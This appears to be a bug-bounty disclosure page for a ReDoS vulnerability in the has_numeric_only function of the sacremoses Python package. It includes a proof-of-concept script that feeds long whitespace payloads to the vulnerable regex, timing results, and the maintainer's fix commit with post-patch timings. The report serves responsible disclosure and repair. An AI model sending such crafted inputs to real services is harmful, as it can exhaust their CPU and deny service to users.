Inefficient Regular Expression Complexity in alvations/sacremoses

Valid

Reported on

Sep 20th 2021


✍️ Description

The sacremoses package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted text as input to the has_numeric_only function may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/alvations/sacremoses/blob/dc203fb2b41e1f8c8bbbd4606732945e6cdb090e/sacremoses/tokenize.py#L366

Put the below in a poc.py file and run

import time
import re

def has_numeric_only(text):
        return bool(re.search(r"(.*)[\s]+(\#NUMERIC_ONLY\#)", text))

for i in range(1, 50000):
    start_time = time.perf_counter()
    payload = " " + " " * (i*500) + ""
    has_numeric_only(payload)
    stop_time = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")

Check the Output:

Payload.length: 501: 0.2941443 ms
Payload.length: 1001: 2.5347709000000003 ms
Payload.length: 1501: 9.3377153 ms
Payload.length: 2001: 21.428344199999998 ms
Payload.length: 2501: 40.7420754 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the alvations/sacremoses team and are waiting to hear back a year ago
alvations validated this vulnerability a year ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
alvations
a year ago

Maintainer


Hopefully the fix patches the issue. https://github.com/alvations/sacremoses/commit/8ad457e3cc25579140757befffd6f0e3b421728d

alvations
a year ago

Maintainer


From the patched code:

Payload.length: 501: 0.003822868000042945
Payload.length: 1001: 0.013954541999964931
Payload.length: 1501: 0.03276839399995879
Payload.length: 2001: 0.03420310699993934
Payload.length: 2501: 0.04483655900003214
Payload.length: 3001: 0.06444194000005155
Payload.length: 3501: 0.08590082599994275
Payload.length: 4001: 0.11723401599988392
Payload.length: 4501: 0.15499364899983448
Payload.length: 5001: 0.1835449590000735
Payload.length: 5501: 0.2252455000000282
Payload.length: 6001: 0.27508970099984253
Payload.length: 6501: 0.3183373350000238
Payload.length: 7001: 0.3812148319998414
Payload.length: 7501: 0.4374870980000196
Payload.length: 8001: 0.46587393099980545
Payload.length: 8501: 0.5298086889999922
Payload.length: 9001: 0.5926716750000196
Payload.length: 9501: 0.6626590920000126
Payload.length: 10001: 0.8364324670001224
Payload.length: 10501: 0.8452605460001905
Payload.length: 11001: 1.0234147620001295
Payload.length: 11501: 1.0170199919998595
Payload.length: 12001: 1.1000493749997986
Payload.length: 12501: 1.152461945999903
Payload.length: 13001: 1.275610899999947
Payload.length: 13501: 1.5599431390000973
Payload.length: 14001: 1.5379346249999344
Payload.length: 14501: 1.6563336639999306
Payload.length: 15001: 1.7692955659999825
Payload.length: 15501: 1.9372383120000904
Payload.length: 16001: 2.1138349539999126
Payload.length: 16501: 2.208436567000035
Payload.length: 17001: 2.380479092000087
Payload.length: 17501: 2.8406364089998988
Payload.length: 18001: 2.697687755999823
Payload.length: 18501: 2.9228775910000877
Payload.length: 19001: 2.982141861000173
Payload.length: 19501: 3.283239590999983
Payload.length: 20001: 3.7901370419999694
Payload.length: 20501: 3.916349029999992
Payload.length: 21001: 4.259886679999909
Payload.length: 21501: 4.544129224000017
Payload.length: 22001: 4.109759947000157
Payload.length: 22501: 5.430233352999949
Payload.length: 23001: 4.856895300000133
Payload.length: 23501: 5.014447578999807
Payload.length: 24001: 5.287110871000095
Payload.length: 24501: 5.420541578999973
Payload.length: 25001: 5.431174684000098
Payload.length: 25501: 5.460154396999997
Payload.length: 26001: 5.928103772999975
Payload.length: 26501: 6.098925184000109
Payload.length: 27001: 7.673190148999993
Payload.length: 27501: 6.890132009999888
Payload.length: 28001: 6.930379094000045
Payload.length: 28501: 7.693255152999882
Payload.length: 29001: 8.07169953499988
Payload.length: 29501: 10.172807593000016
Payload.length: 30001: 8.116375470000094
Payload.length: 30501: 8.90535412500003
Payload.length: 31001: 8.844282576000069
Payload.length: 31501: 8.884001552999962
Payload.length: 32001: 9.157708125
Payload.length: 32501: 10.213799708999886
Payload.length: 33001: 10.733917410000004
Payload.length: 33501: 10.971407869000132
Payload.length: 34001: 10.043182203000015
Payload.length: 34501: 10.756050633000086
Payload.length: 35001: 10.993081897000138
Payload.length: 35501: 11.081026316999896
Payload.length: 36001: 11.170041388999834
Payload.length: 36501: 12.004563393000126
Payload.length: 37001: 12.02783777600007
Payload.length: 37501: 12.290785987999925
Payload.length: 38001: 12.940709454999933
Payload.length: 38501: 13.295860833000006
Payload.length: 39001: 15.26432554500002
Payload.length: 39501: 14.020210018999933
Payload.length: 40001: 14.538428580999835
Payload.length: 40501: 14.936995268000146
Payload.length: 41001: 15.897866563000207
Payload.length: 41501: 15.54425606000018
Payload.length: 42001: 15.995694290999836
Payload.length: 42501: 17.443289820000018
Payload.length: 43001: 20.75653818600017
Payload.length: 43501: 19.046379836999904
Payload.length: 44001: 20.43581257400001
Payload.length: 44501: 22.571010244999798
Payload.length: 45001: 19.44450578399983
Payload.length: 45501: 18.88811397900008
Payload.length: 46001: 18.30662667899969
Payload.length: 46501: 17.883042994000334
Payload.length: 47001: 18.59654988500006
alvations confirmed that a fix has been merged on 8ad457 a year ago
alvations has been awarded the fix bounty
tokenize.py#L366 has been validated
to join this conversation